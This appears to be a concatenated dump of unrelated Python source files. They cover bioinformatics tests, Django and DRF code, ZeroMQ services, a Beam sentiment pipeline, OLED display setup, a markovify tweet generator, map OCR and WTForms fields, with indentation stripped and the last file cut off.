# create a temp directory for output
tempdir = utils.create_temp_folder("gene_families")
# run humann test
command = ["humann","--input",cfg.demo_gene_families_biom,"--output",tempdir]
utils.run_humann(command)
# check the output files are as expected
# it will include all output files except the gene families output file
# since this file was used as input
for expression, message in utils.check_output(cfg.expected_demo_output_files_genefamilies_input, tempdir):
self.assertTrue(expression,message)
# remove the temp directory
utils.remove_temp_folder(tempdir)
|
8,153 | eb75f6e959e9153e6588a0322d1ebc75e21e73ef | # Generated by Django 2.1.2 on 2018-10-26 05:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('candidate', '0004_remove_candidate_corrected_loc'),
]
operations = [
migrations.AlterField(
model_name='candidate',
name='analytics_exp',
field=models.FloatField(blank=True, default=0.0),
),
]
|
8,154 | 26df6ddf3533a8648b59f0fa2b03f89c93af7491 | import numpy as np
import pickle
import preprocessor
import pandas as pd
import sys
from scipy import spatial
class Predict:
def __init__(self, text):
"""
taking the user input string
loading trained feature numpy array
loading the output for the numpy array
loading the vectorizer saved during training
:param text:
"""
self.text = text
self.train_vec = np.load('feat.npy')
self.train_output = pickle.load(open('mylist.pkl', 'rb'))
self.vec = pickle.load(open('vector.pkl', 'rb'))
def process_text(self):
"""
creating an instance of Preprocess class
applying clean_data function on the text
transforming the text to tfidf array
"""
prp1 = preprocessor.Preprocess()
processed_text = prp1.clean_data(self.text)
self.vec1 = self.vec.transform(pd.Series(processed_text))
def compute_cosine_similarity(self):
"""
creating an empty list for storing the cosine values
multiplying the input vector with every row of training vector
appending the cosine value to the list
taking the index of maximum value of the list
using the index to find the attribute from the output_vector
"""
cos_matrix = []
for i in range(len(self.train_vec)):
val = self.vec1 * self.train_vec[i]
cos_matrix.append(val[0])
out = np.argmax(cos_matrix)
print(self.train_output[out])
if __name__ == '__main__':
text = sys.argv[1:]
text = ' '.join(text)
p1 = Predict(text)
p1.process_text()
p1.compute_cosine_similarity()
|
8,155 | ffee0b0e00b4cebecefc3671332af3e2ffe7491b | import visgraph.dbcore as vg_dbcore
dbinfo = {
'user':'visgraph',
'password':'ohhai!',
'database':'vg_test',
}
def vgtest_basic_database():
#vg_dbcore.initGraphDb(dbinfo)
gstore = vg_dbcore.DbGraphStore(dbinfo)
n1 = gstore.addNode(ninfo={'name':'foo', 'size':20})
n2 = gstore.addNode(ninfo={'name':'bar', 'size':300})
n3 = gstore.addNode(ninfo={'name':'baz'})
n4 = gstore.addNode(ninfo={'name':'faz'})
n5 = gstore.addNode(ninfo={'name':'yer'})
n6 = gstore.addNode(ninfo={'name':'mom'})
gstore.addEdge(n3, n4)
gstore.addEdge(n4, n5)
gstore.addEdge(n5, n6)
print gstore.getNodeInfo(n1, 'name')
print gstore.getNodeInfo(n1, 'size')
print gstore.getNodeInfo(n1, 'owoot', 20)
eid = gstore.addEdge(n1, n2, einfo={'etype':'FooEdge'})
print eid
gstore.setEdgeInfo(eid, 'name', 'asdf')
gstore.setEdgeInfo(eid, 'size', 20)
print gstore.getEdgeInfo(eid, 'size')
sg = gstore.buildSubGraph()
sg.useEdges(size=20)
#n3 = sg.addNode(ninfo={'name':'Tom Jones'})
#sg.addEdge(n2, n3, einfo={'etype':'FBFriend'})
#print sg.getRefsFrom(n2)
for eid, fromid, toid, einfo in sg.getRefsFrom(n2):
print 'NAMES: %s -> %s' % (sg.getNodeInfo(fromid, 'name', 'unknown'), sg.getNodeInfo(toid, 'name', 'unknown'))
sg.expandNode(n3, maxdepth=1)
|
8,156 | e40f0a25d0c02f36c254e630133dc1fb11f29d4d | from rest_framework.urlpatterns import format_suffix_patterns
from django.urls import path
from external_api import views
urlpatterns = [
path('darksky/', views.DarkSkyView.as_view())
]
urlpatterns = format_suffix_patterns(urlpatterns)
|
8,157 | 87130c2bbf919cacd3d5dd823cd310dcad4dc790 | """Test suite for phlsys_tryloop."""
from __future__ import absolute_import
import datetime
import itertools
import unittest
import phlsys_tryloop
# =============================================================================
# TEST PLAN
# -----------------------------------------------------------------------------
# Here we detail the things we are concerned to test and specify which tests
# cover those concerns.
#
# Concerns:
# [ B] tryLoopDelay returns the value from the supplied 'toTry' func on success
# [ B] tryLoopDelay accepts [] for 'delays' and still calls toTry once
# [ C] tryLoopDelay ignores exceptionToIgnore until delays is empty
# [ C] tryLoopDelay re-raises exceptionToIgnore when delays is empty
# [ D] exceptions not derived from exceptionToIgnore raise through tryLoopDelay
# [ E] tryLoopDelay calls 'onException' if exceptionToIgnore is intercepted
# [ ] tryLoopDelay waits 'delay' seconds between attempts
# [ F] endless_retry makes many valid increasing delays
# [ G] short_retry makes a finite amount of valid delays
# -----------------------------------------------------------------------------
# Tests:
# [ A] test_A_Breathing
# [ B] test_B_ReturnsValue
# [ C] test_C_RetriesEachDelay
# [ D] test_D_RaiseThrough
# [ E] test_E_CallsOnException
# [ F] test_F_ValidLongIncreasingEndlessRetry
# [ G] test_G_ValidFiniteShortRetry
# =============================================================================
class Test(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_A_Breathing(self):
pass
def test_B_ReturnsResult(self):
self.assertEqual(1, phlsys_tryloop.try_loop_delay(lambda: 1, []))
self.assertEqual("hi", phlsys_tryloop.try_loop_delay(lambda: "hi", []))
def test_C_RetriesEachDelay(self):
class TestException(Exception):
pass
counter = []
def failer():
counter.append(1)
raise TestException()
numDelays = 4
delays = [datetime.timedelta() for _ in range(0, numDelays)]
try:
phlsys_tryloop.try_loop_delay(failer, delays, TestException)
except TestException:
pass
else:
raise Exception("did not receive TestException")
self.assertEqual(1 + numDelays, len(counter))
def test_D_RaiseThrough(self):
class TestException(Exception):
pass
counter = []
def failer():
counter.append(1)
raise TypeError()
numDelays = 4
delays = [datetime.timedelta() for _ in range(0, numDelays)]
try:
phlsys_tryloop.try_loop_delay(failer, delays, TestException)
except TypeError:
pass
else:
raise Exception("did not receive TypeError")
self.assertEqual(1, len(counter))
def test_E_CallsOnException(self):
fail_counter = []
on_exception_counter = []
class TestException(Exception):
pass
def failer():
fail_counter.append(1)
raise TestException()
def on_exception(e, delay):
print e
if delay is not None:
print delay.total_seconds()
on_exception_counter.append(1)
numDelays = 4
delays = [datetime.timedelta() for _ in range(0, numDelays)]
try:
phlsys_tryloop.try_loop_delay(
failer, delays, onException=on_exception)
except TestException:
pass
else:
raise Exception("did not receive TestException")
self.assertEqual(1 + numDelays, len(fail_counter))
self.assertEqual(len(fail_counter), len(on_exception_counter))
def test_F_ValidLongIncreasingEndlessRetry(self):
# [ F] endless_retry makes many valid increasing delays
delays = phlsys_tryloop.make_default_endless_retry()
first_secs = None
last_secs = None
for i in itertools.islice(delays, 1000):
secs = i.total_seconds()
self.assertGreaterEqual(secs, 0)
self.assertTrue(last_secs is None or secs >= last_secs)
if first_secs is None:
first_secs = secs
last_secs = secs
self.assertGreater(last_secs, first_secs)
def test_G_ValidFiniteShortRetry(self):
# [ G] short_retry makes a finite amount of valid delays
is_empty = True
for i in phlsys_tryloop.make_default_short_retry():
is_empty = False
secs = i.total_seconds()
self.assertGreaterEqual(secs, 0)
self.assertLess(secs, 3600) # one hour is definitely not short
self.assertFalse(is_empty)
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2014 Bloomberg Finance L.P.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ------------------------------ END-OF-FILE ----------------------------------
|
8,158 | fee757b91f8c2ca1c105d7e67636772a8b5eafd5 | from logging import getLogger
from time import sleep
from uuid import UUID
from zmq import Context, Poller, POLLIN, ZMQError, ETERM # pylint: disable-msg=E0611
from zhelpers import zpipe
from dcamp.service.configuration import Configuration
from dcamp.types.messages.control import SOS
from dcamp.types.specs import EndpntSpec
from dcamp.util.decorators import runnable
@runnable
class RoleMixin(object):
def __init__(
self,
pipe,
ep,
uuid,
):
self.ctx = Context.instance()
self.__control_pipe = pipe
assert isinstance(ep, EndpntSpec)
self.__endpoint = ep
assert isinstance(uuid, UUID)
self.__uuid = uuid
self.__config_service = None
self.logger = getLogger('dcamp.role.%s' % self)
# { pipe: service, ...}
self.__services = {}
def __str__(self):
return self.__class__.__name__
def __send_control_str(self, message):
self.__control_pipe.send_string(message)
def __recv_control(self):
return self.__control_pipe.recv_string()
def get_config_service(self):
return self.__config_service
def get_config_service_kvdict(self):
assert self.__config_service is not None
return self.__config_service.copy_kvdict()
def _add_service(self, cls, *args, **kwargs):
pipe, peer = zpipe(self.ctx) # create control socket pair
# create service, passing local values along with rest of given args
service = cls(peer, self.__endpoint, self.__uuid, self.__config_service, *args, **kwargs)
self.__services[pipe] = service # add to our dict, using pipe socket as key
if Configuration == cls:
self.__config_service = service
def sos(self):
SOS(self.__endpoint, self.__uuid).send(self.__control_pipe)
def play(self):
# start each service thread
for service in self.__services.values():
service.start()
# @todo: wait for READY message from each service / issue #37
self.run_state()
self.logger.debug('waiting for control commands')
# listen for control commands from caller
while self.in_running_state:
try:
msg = self.__recv_control()
if 'STOP' == msg:
self.__send_control_str('OKAY')
self.logger.debug('received STOP control command')
self.stop_state()
break
else:
self.__send_control_str('WTF')
self.logger.error('unknown control command: %s' % msg)
except ZMQError as e:
if e.errno == ETERM:
self.logger.debug('received ETERM')
self.error_state()
break
else:
raise
except KeyboardInterrupt: # only for roles played by dcamp.App
self.logger.debug('received KeyboardInterrupt')
self.stop_state()
break
# role is exiting; cleanup
return self.__cleanup()
def __cleanup(self):
# stop our services cleanly (if we can)
if not self.in_errored_state:
# @todo: this might raise an exception / issue #38
self.__stop()
# shared context; will be term()'ed by caller
# close all service sockets
for pipe in self.__services:
pipe.close()
del self.__services
# close our own control pipe
self.__control_pipe.close()
del self.__control_pipe
self.logger.debug('role cleanup finished; exiting')
def __stop(self):
""" try to stop all of this Role's services """
# send commands
poller = Poller()
for (pipe, svc) in self.__services.items():
pipe.send_string('STOP')
self.logger.debug('sent STOP command to %s service' % svc)
poller.register(pipe, POLLIN)
# give services a few seconds to cleanup and exit before checking responses
sleep(1)
max_attempts = len(self.__services)
attempts = 0
while self.__some_alive() and attempts < max_attempts:
attempts += 1
# poll for any replies
items = dict(poller.poll(60000)) # wait for messages
# mark responding services as stopped
alive = dict(self.__services) # make copy
for (pipe, svc) in alive.items():
if pipe in items:
reply = pipe.recv_string()
if 'STOPPED' == reply:
self.logger.debug('received STOPPED control reply from %s service' % svc)
svc.join(timeout=5) # STOPPED response should be sent right before svc exit
if svc.is_alive():
self.logger.error('%s service is still alive; not waiting' % svc)
else:
self.logger.debug('%s service thread stopped' % svc)
poller.unregister(pipe)
pipe.close()
del (self.__services[pipe])
else:
self.logger.debug('unknown control reply: %s' % reply)
# log some useful info
if len(self.__services) > 0:
msg = '%s services still alive after %d cycles; ' % (
[str(s) for s in self.__services.values()], attempts)
if attempts < max_attempts:
msg += 'waiting'
else:
msg += 'giving up'
self.logger.debug(msg)
def __some_alive(self):
"""returns True if at least one service of this Role is still running"""
for service in self.__services.values():
if service.is_alive():
return True
return False
|
8,159 | 93a2385d9ebdbc1a7a88185c0a0d5d1f227e46a3 | import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions,SetupOptions
from apache_beam.options.pipeline_options import GoogleCloudOptions
from apache_beam.options.pipeline_options import StandardOptions
dataflow_options = ['--project=lofty-shine-248403', '--job_name=newjob', '--temp_location=gs://testing-gcp-mandar/temp']
dataflow_options.append('--staging_location=gs://testing-gcp-mandar/staging')
options = PipelineOptions(dataflow_options)
gcloud_options = options.view_as(GoogleCloudOptions)
# Dataflow runner
options.view_as(StandardOptions).runner = 'Directrunner'
# options.view_as(SetupOptions).save_main_session = True
options.view_as(StandardOptions).streaming = True
table_schema = {'fields': [
{'name': 'Tweet', 'type': 'STRING', 'mode': 'NULLABLE'},
{'name': 'Sentiment', 'type': 'STRING', 'mode': 'NULLABLE'}
]}
def MLmodel(data):
import pickle
import numpy as np
from google.cloud import storage
storage_client = storage.Client()
bucket = storage_client.get_bucket("testing-gcp-mandar")
blob = bucket.blob("model.pkl")
model_local = "TwitterSA_model.pkl"
blob.download_to_filename(model_local)
pickle_in = open("TwitterSA_model.pkl", "rb")
model = pickle.load(pickle_in)
blob = bucket.blob("prep.pkl")
model_local = "TwitterSA_prep.pkl"
blob.download_to_filename(model_local)
pickle_prep = open("TwitterSA_prep.pkl", "rb")
prep = pickle.load(pickle_prep)
# print tweet
ntweet = [data]
x = prep.transform(ntweet)
pred = model.predict(x)
l1 = []
temp = {}
temp['Tweet'] = str(data)
temp['Sentiment'] = str(pred).replace('[', '').replace(']', '')
l1.append(temp)
print(l1)
p = beam.Pipeline(options=options)
lines = \
(p | 'Read Data From PubSub' >> beam.io.ReadFromPubSub(subscription='projects/lofty-shine-248403/subscriptions/TweetSub').with_output_types(bytes)
# | 'decode' >> beam.Map(lambda x: x.decode('utf-8'))
| 'predict' >> beam.ParDo(MLmodel)
| 'storing in bigQ' >> beam.io.WriteToBigQuery(
schema=table_schema,
table="lofty-shine-248403:my_new_datasset.TweetLiveSentiment")
)
p.run().wait_until_finish() |
8,160 | d8cbed25f4c97be5a74a6e1f097fcb9fa9439a9a | import Adafruit_GPIO.SPI as SPI
import Adafruit_SSD1306
# Raspberry Pi pin configuration:
RST = 24
# Note the following are only used with SPI:
DC = 23
SPI_PORT = 0
SPI_DEVICE = 0
# Beaglebone Black pin configuration:
# RST = 'P9_12'
# Note the following are only used with SPI:
# DC = 'P9_15'
# SPI_PORT = 1
# SPI_DEVICE = 0
# 128x32 display with hardware I2C:
#disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST)
# 128x64 display with hardware I2C:
#disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST)
# Note you can change the I2C address by passing an i2c_address parameter like:
# disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, i2c_address=0x3C)
# Alternatively you can specify an explicit I2C bus number, for example
# with the 128x32 display you would use:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, i2c_bus=2)
# 128x32 display with hardware SPI:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))
# 128x64 display with hardware SPI:
disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000))
# Alternatively you can specify a software SPI implementation by providing
# digital GPIO pin numbers for all the required display pins. For example
# on a Raspberry Pi with the 128x32 display you might use:
# disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC, sclk=18, din=25, cs=22)
# Initialize library.
disp.begin()
# Clear display.
disp.clear()
disp.display()
|
8,161 | 997c1c86848b59a3986a579d5b1b50313fdfdf44 | from stats_arrays.distributions import GeneralizedExtremeValueUncertainty as GEVU
from stats_arrays.errors import InvalidParamsError
from ..base import UncertaintyTestCase
import numpy as np
class GeneralizedExtremeValueUncertaintyTestCase(UncertaintyTestCase):
def test_random_variables(self):
params = self.make_params_array()
params['loc'] = 2
params['scale'] = 5
# Formula for median (loc - scale * ln ln 2)
expected_median = 2 - 5 * np.log(np.log(2))
results = GEVU.random_variables(params, 10000)
found_median = np.median(results)
self.assertEqual(results.shape, (1, 10000))
self.assertTrue(0.95 * expected_median < found_median)
self.assertTrue(found_median < 1.05 * expected_median)
def test_loc_validation(self):
params = self.make_params_array()
params['loc'] = np.NaN
self.assertRaises(
InvalidParamsError,
GEVU.validate,
params
)
def test_scale_validation(self):
params = self.make_params_array()
params['scale'] = -1
self.assertRaises(
InvalidParamsError,
GEVU.validate,
params
)
def test_shape_validation(self):
params = self.make_params_array()
params['shape'] = 1
self.assertRaises(
InvalidParamsError,
GEVU.validate,
params
)
def make_params_array(self, length=1):
assert isinstance(length, int)
params = np.zeros((length,), dtype=[
('input', 'u4'),
('output', 'u4'),
('loc', 'f4'),
('negative', 'b1'),
('scale', 'f4'),
('shape', 'f4'),
('minimum', 'f4'),
('maximum', 'f4')
])
params['minimum'] = params['maximum'] = np.NaN
params['loc'] = params['scale'] = 1
return params
|
8,162 | 80c6dd1c76b3ac56f34e36f571e8db3927994311 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Fetch screen scores with customizable search criteria
that can be tailored to match your own requirements
in tab format
"""
import requests
from core import config as cfg
screen_id = 178
request_url = cfg.BASE_URL + "/screen/" + str(screen_id)
# These parameters can be modified to match any search criteria following
# the rules outlined in the Wiki: https://wiki.thebiogrid.org/doku.php/orcs:webservice
# In this instance, we've chosen to return results in "tab" format with a header, and
# to limit scores in the SCORE.1 column to the range of 0.9 -> 0.98
params = {
"accesskey": cfg.ACCESS_KEY,
"format": "tab",
"header": "yes",
"score1min": 0.9,
"score1max": 0.98
}
r = requests.get( request_url, params = params )
screen = r.text.splitlines( )
row_count = 0
data = {}
for row in screen :
# Skip the header, but you could have also simply turned
# it off with header: "no" as a parameter instead
if row_count == 0 :
row_count = row_count + 1
continue
# Tab files are tab delimited
row = row.split( "\t" )
# create a hash of results by gene identifier
data[row[1]] = row
# Print out data about the genes BRIX1, ASB4, and NOB1
print( data['55299'] )
print( data['51666'] )
print( data['28987'] )
"""
Output as of version 1.0.1:
['178', '55299', 'gene', 'BRIX1', 'BRIX|BXDC2|FLJ11100', '9606', 'Homo sapiens', '0.94239', '0.999965', '-', '-', '-', 'NO', 'BioGRID ORCS']
['178', '51666', 'gene', 'ASB4', 'ASB-4', '9606', 'Homo sapiens', '0.97613', '0.999965', '-', '-', '-', 'NO', 'BioGRID ORCS']
['178', '28987', 'gene', 'NOB1', 'ART-4|MST158|MSTP158|NOB1P|PSMD8BP1', '9606', 'Homo sapiens', '0.96316', '0.999965', '-', '-', '-', 'NO', 'BioGRID ORCS']
""" |
8,163 | 53bf97d66d0b26c6b5639acd0261604082474e7b | '''Instantiate data parsers for all cities.
If additional city parsers are added, the `bikerrawdata` instance in this file should be updated.
Written by: Anders Ohrn 2020
'''
from dataset_creators.cities import parse_taipei_file, taipei_system, \
parse_london_file, london_system, \
parse_helsiki_file, helsinki_system, \
parse_toronto_file, toronto_system
from ._bikerawdata import BikeRawData
bikerawdata = BikeRawData()
bikerawdata.add_system(city_label='taipei', bikesharesystem_data=taipei_system)
bikerawdata.add_parser(city_label='taipei', parser_func=parse_taipei_file)
bikerawdata.add_system(city_label='helsinki', bikesharesystem_data=helsinki_system)
bikerawdata.add_parser(city_label='helsinki', parser_func=parse_helsiki_file)
bikerawdata.add_system(city_label='london', bikesharesystem_data=london_system)
bikerawdata.add_parser(city_label='london', parser_func=parse_london_file)
bikerawdata.add_system(city_label='toronto', bikesharesystem_data=toronto_system)
bikerawdata.add_parser(city_label='toronto', parser_func=parse_toronto_file)
def compile_data(city_labels=None):
'''Compile all data into common structure
'''
pass
def compile_and_save_data(f_out, city_labels=None):
'''Compile and save all data
'''
pass |
8,164 | cc71c0cc1ec21dc465486fb5894c4d389c39bd62 | import markovify
import argparse
import sqlite3
import time
modelFile = './data/model.json'
corpusFile = './data/corpus.txt'
dbFile = './data/tweets.sqlite3'
def generate():
generate_count = 168
model_json = open(modelFile, 'r').read()
model = markovify.Text.from_json(model_json)
conn = sqlite3.connect(dbFile)
c = conn.cursor()
for i in range(generate_count):
content = model.make_short_sentence(140)
generated_timestamp = int(time.time())
if content:
c.execute('INSERT INTO tweets (content,generated_timestamp) VALUES (?,?)', (content,generated_timestamp))
print(content)
print(generated_timestamp)
print('----------')
conn.commit()
conn.close()
def make_model():
corpus = open(corpusFile).read()
text_model = markovify.Text(corpus, state_size=4)
model_json = text_model.to_json()
f = open(modelFile, mode='w')
f.write(model_json)
f.close()
def full_gen():
corpus = open(corpusFile).read()
model = markovify.Text(corpus, state_size=4)
generate_count = 168
conn = sqlite3.connect(dbFile)
c = conn.cursor()
for i in range(generate_count):
content = model.make_short_sentence(140, max_overlap_ratio=.8)
generated_timestamp = int(time.time())
if content:
c.execute('INSERT INTO tweets (content,generated_timestamp) VALUES (?,?)', (content,generated_timestamp))
print(content)
print(generated_timestamp)
print('----------')
conn.commit()
conn.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--model", action="store_true", default=False, help="Create Model JSON")
parser.add_argument("--gen", action="store_true", default=False, help="Generate from stored Model")
parser.add_argument("--full", action="store_true", default=False, help="Full Geneate")
args = parser.parse_args()
if args.gen:
generate()
elif args.model:
make_model()
else:
full_gen()
|
8,165 | d3be26d56b3597a5d9e3a870b735a30d90d1e501 | import cv2
import pytesseract
import os
from PIL import Image
import numpy as np
from helper_functions import Helper
class ImageData:
# multipliers to get portion of image with interval value
__bottom_thresh = 0.9
__left_thresh = 0.35
__right_thresh = 0.65
# (words, offset) to contour interval value
__words_offsets = [("CONTOUR", 2), ("INTERVAL", 1), ("FEET", -1)]
__resize_factor = 6
def __init__(self, image):
self.image = image
# self.sub_image = self.__get_sub_image()
# word_list, box_list = self.__get_words()
# self.word_list = word_list
# self.box_list = box_list
self._contour_interval_dist = None
self._feet_per_pixel = None
def __get_sub_image(self):
rows, cols, chan = self.image.shape
sub_image = self.image[
int(self.__bottom_thresh*rows):rows, # bottom rows
int(self.__left_thresh*cols):int(self.__right_thresh*cols) # middle rows
]
sub_image = cv2.resize(sub_image, None, fx=self.__resize_factor, fy=self.__resize_factor,
interpolation = cv2.INTER_LINEAR)
sub_image = Helper.convert_image_to_mask(sub_image)
gray_denoised_image = cv2.fastNlMeansDenoising(sub_image, None, 5, 7, 21)
threshold_image = cv2.threshold(gray_denoised_image,225,255,cv2.THRESH_BINARY_INV)[1]
return sub_image
def __get_countour_interval_dist(self):
candidates = []
for word, offset in self.__words_offsets:
candidates += self.__find_candidates_for_id_and_index(self.word_list, word, offset)
return candidates[0][1] if len(candidates) > 0 else 40
def __get_feet_per_pixel(self):
# row_size = 6
# total = int(len(self.box_list) / 6)
# idx = 0
# nums = [(idx, int(char)) for idx, char in enumerate(self.box_list)
# if idx % row_size == 0 and char.isdigit() and int(char) > 2 and int(char) < 10]
# nums.sort(key=lambda val: self.box_list[val[0] + 2])
# threshold = 3
# prev_x = -1
# prev_y = -2 * threshold
# prev_num = -1
# img = self.sub_image.copy()
# lsd = cv2.createLineSegmentDetector(0)
# lines = lsd.detect(img)[0]
# drawn_img = lsd.drawSegments(img,lines)
# cv2.imshow("LSD",drawn_img )
# # h, w, _ = img.shape
# # for (idx, num) in nums:
# # cur_x = int(self.box_list[idx + 1])
# # cur_y = int(self.box_list[idx + 2])
# # cur_x2 = int(self.box_list[idx + 3])
# # cur_y2 = int(self.box_list[idx + 4])
# # print(str(num) + ": " + str(cur_x) + ", " + str(cur_y) + " :: " + str(cur_x2) + ", " + str(cur_y2))
# # img = cv2.rectangle(img,(cur_x,h-cur_y),(cur_x2,h-cur_y2),(255,0,0),2)
# # # if abs(cur_y - prev_y) < threshold:
# # # dist = abs(cur_x - cur_y)
# # # diff = abs(num - prev_num)
# # # print("possibility found ^\n--------")
# # # prev_x = cur_x
# # # prev_y = cur_y
# # # prev_num = num
# img = cv2.resize(img, None, fx=1/6, fy=1/6,
# interpolation = cv2.INTER_LINEAR)
# cv2.imshow("blah", img)
# print(nums)
return 5280 / 790# hardcoded estimatem, ft per mile / pixel per mile = feet per pixel
def __find_candidates_for_id_and_index(self, word_list, id_word, offset):
candidates = []
indices = [i for i, x in enumerate(word_list) if x.upper() == id_word]
for i in indices:
if word_list[i+offset].isnumeric():
cand = (i, int(word_list[i+offset]))
candidates.append(cand)
return candidates
def __get_words(self):
filename = "{}.png".format(os.getpid())
cv2.imwrite(filename, self.sub_image)
words = pytesseract.image_to_string(Image.open(filename))
boxes = pytesseract.image_to_string(Image.open(filename), boxes=True, config="hocr")
os.remove(filename)
word_list = words.split()
box_list = boxes.split()
return word_list, box_list
@property
def contour_interval_dist(self):
# if self._contour_interval_dist is None:
# self._contour_interval_dist = self.__get_countour_interval_dist()
# return self._contour_interval_dist
# return 40
return 40
@contour_interval_dist.setter
def contour_interval_dist(self, value):
self._contour_interval_dist = value
@property
def feet_per_pixel(self):
if self._feet_per_pixel is None:
self._feet_per_pixel = self.__get_feet_per_pixel()
return self._feet_per_pixel
@feet_per_pixel.setter
def feet_per_pixel(self, value):
self._feet_per_pixel = value
class TopographicMap:
def __init__(self, filename):
self.filename = filename
self.image = cv2.imread(filename, 1)[500:-550, 500:-500]
# self.image = cv2.imread(filename, 1)#[500:-550, 500:-500]
self.image_data = ImageData(self.image)
self.height, self.width, self.channels = self.image.shape
if __name__ == '__main__':
# img = Topographic_Map("SanLuisObispo.jpg")
import numpy as np
import time
image = cv2.imread('maps/SanLuisObispo.jpg', 1)[500:1000, 500:1300]
r, c, chan = image.shape
tl = image[:int(r/2), :int(c/2)]
tr = image[:int(r/2), int(c/2):]
bl = image[int(r/2):, :int(c/2)]
br = image[int(r/2):, int(c/2):]
s = time.time()
img = cv2.fastNlMeansDenoising(image, None, 5, 7, 21)
e = time.time()
print("total image: " + str(e-s))
s = time.time()
tl = cv2.fastNlMeansDenoising(tl, None, 5, 7, 21)
tr = cv2.fastNlMeansDenoising(tr, None, 5, 7, 21)
bl = cv2.fastNlMeansDenoising(bl, None, 5, 7, 21)
br = cv2.fastNlMeansDenoising(br, None, 5, 7, 21)
e = time.time()
top = np.concatenate((tl, tr), axis=1)
bottom = np.concatenate((bl, br), axis=1)
new_image = np.concatenate((top, bottom), axis=0)
print("partitioned image: " + str(e-s))
cv2.imshow('img', img)
cv2.imshow('new_image', new_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
8,166 | 72b29764f584c7f824eaa63ab0fdb1839a8d9102 | from collections import OrderedDict
import re
from copy import copy
from datetime import datetime
import json
from bson import ObjectId
from bson.errors import InvalidId
from wtforms import Field
class StringField(Field):
def __init__(self, label=None, validators=None, empty_to_default=True,
strip=True, words_filter=None, no_to_default=True, **kwargs):
super().__init__(label, validators, **kwargs)
self.empty_to_default = empty_to_default
self.strip = strip
self.words_filter = words_filter
self.no_to_default = no_to_default
def process_formdata(self, values):
if values:
value = values[0]
if self.strip:
value = value.strip()
if self.words_filter:
value = self.words_filter.filter(value)
if value == "":
self.data = self.default if self.empty_to_default else ""
else:
self.data = value
else:
if self.no_to_default:
self.data = self.default
else:
self.data = None
class IntegerField(Field):
def __init__(self, label=None, validators=None, empty_to_default=True,
no_to_default=True, **kwargs):
super().__init__(label, validators, **kwargs)
self.empty_to_default = empty_to_default
self.no_to_default = no_to_default
def process_formdata(self, values):
if values:
value = values[0].strip()
if value == "":
self.data = self.default if self.empty_to_default else ""
else:
try:
self.data = int(value)
except ValueError:
self.data = None
raise ValueError("invalid int: '{}'"
.format(values[0]))
else:
if self.no_to_default:
self.data = self.default
else:
self.data = None
class FloatField(Field):
def __init__(self, label=None, validators=None, empty_to_default=True,
no_to_default=True, **kwargs):
super().__init__(label, validators, **kwargs)
self.empty_to_default = empty_to_default
self.no_to_default = no_to_default
def process_formdata(self, values):
if values:
value = values[0].strip()
if value == "":
self.data = self.default if self.empty_to_default else ""
else:
try:
self.data = float(value)
except ValueError:
self.data = None
raise ValueError("invalid float: '{}'"
.format(values[0]))
else:
if self.no_to_default:
self.data = self.default
else:
self.data = None
class BooleanField(Field):
def __init__(self, label=None, validators=None, false_values=('false', '0'),
empty_to_default=True, no_to_default=True, **kwargs):
super().__init__(label, validators, **kwargs)
self.false_values = false_values
self.empty_to_default = empty_to_default
self.no_to_default = no_to_default
def process_formdata(self, values):
if values:
value = values[0].strip()
if value == "":
self.data = self.default if self.empty_to_default else ""
else:
self.data = False if value in self.false_values else True
else:
if self.no_to_default:
self.data = self.default
else:
self.data = None
class DateTimeField(Field):
def __init__(self, label=None, validators=None,
format='%Y-%m-%d %H:%M:%S', empty_to_default=True,
tzinfo=None, no_to_default=True, **kwargs):
super().__init__(label, validators, **kwargs)
self.format = format
self.empty_to_default = empty_to_default
self.tzinfo = tzinfo
self.no_to_default = no_to_default
def process_formdata(self, values):
if values:
value = values[0].strip()
if value == "":
self.data = self.default if self.empty_to_default else ""
else:
try:
self.data = datetime.strptime(value, self.format)
if self.tzinfo:
self.data = self.data.replace(tzinfo=self.tzinfo)
except ValueError:
self.data = None
raise ValueError("invalid datetime: '{}'"
.format(values[0]))
else:
if self.no_to_default:
self.data = self.default
else:
self.data = None
class DateField(Field):
def __init__(self, label=None, validators=None, format='%Y-%m-%d',
empty_to_default=True, no_to_default=True, **kwargs):
super().__init__(label, validators, **kwargs)
self.format = format
self.empty_to_default = empty_to_default
self.no_to_default = no_to_default
def process_formdata(self, values):
if values:
value = values[0].strip()
if value == "":
self.data = self.default if self.empty_to_default else ""
else:
try:
self.data = datetime.strptime(value, self.format).date()
except ValueError:
self.data = None
raise ValueError("invalid datetime: '{}'"
.format(values[0]))
else:
if self.no_to_default:
self.data = self.default
else:
self.data = None
class ObjectIdField(Field):
def __init__(self, label=None, validators=None, empty_to_default=True,
